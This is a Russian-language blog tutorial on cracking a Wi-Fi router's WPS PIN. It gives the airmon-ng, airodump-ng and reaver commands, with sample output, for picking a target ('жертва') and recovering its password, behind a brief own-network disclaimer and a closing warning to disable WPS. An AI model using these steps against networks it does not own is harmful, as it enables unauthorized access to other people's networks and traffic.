Статьи

Всем доброго времени суток и сегодня я расскажу Вам как можно быстро и просто взломать сеть Wi-Fi. Ведь именно об этом мечтают начинающие хакеры – взламывать сети, прячась в тени, используя свой меленький нетбук…

Но сначала мы должны определиться – всё, что здесь написано предназначено для тестирование на стойкость к проникновению СВОЕЙ собственной точки доступа, так как взламывать чужие точки доступа и сети НЕЗАКОННО.

Итак, вы скачали хакерский дистрибутив Kali linux и даже установили его на флешку, чтобы не палиться, но что делать теперь? Самый простой способ опробовать свои силы – использовать уязвимость в протоколе WPS.

WPS – это стандарт и протакол позволяющий быстро получить доступ к Wi-Fi сети не заморачиваясь с длинным и сложным паролем, а просто посмотрев PIN код на наклейке роутера. Удобно? Естественно. Безопасно? Естественно нет!

Для взлома WPS существует простая утилита reaver. В Kali linux она установлена «из коробки». Для взлома нам нужно проделать следующее:

  • Загрузиться в Kali Linux;
  • Запустить терминал;
  • Отключиться от всех текущих Wi-Fi подключений;
  • Найти цель;
  • Запустить reaver;

Теперь подробнее. После запуска терминала вводим команды:

airmon-ng start wlan0

 Это переведёт вашу карту в режим мониторинга (Важно: вы не должны быть подключены к Wi-Fi сети в процессе взлома). В ответ на команду вы получите ответ:

root@Server2012:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2356 NetworkManager
2439 wpa_supplicant

Interface Chipset Driver

wlan0 Unknown rt2800pci – [phy0]
(monitor mode enabled on mon0)

 Теперь ищем жертву, для этого сканируем эфир и копируем BSSID нужной нам точки доступа, нам поможет команда:

airodump-ng mon0

 Остановить выполнение команды можно сочетанием клавишь CTRL+C. На скрине я выделил BSSID своей точки доступа (дефолтный роутер от beeline).

Ищем нужную сеть с помощью airodump-ng. Запоминаем или копируем BSSID

Время запустить риппера и пойти пить чай, для этого вводим команду (BSSID подставьте свой):

reaver -i mon0 -b 14:A9:E3:00:EB:74 –vv

 У меня процесс взлома занял 21 минуту, очень мало, для других способов взлома Вы дольше будите пакеты собирать.

Reaver закончил свою работу, пароль найден

 Выводы: если в Вашем роутере включён WPS, то считайте, что Вы пользуетесь незащищённой сетью…

 

Об авторе блога


Дмитрий Кушавин

Персональный блог. IT, безопасность, политика и важные новости.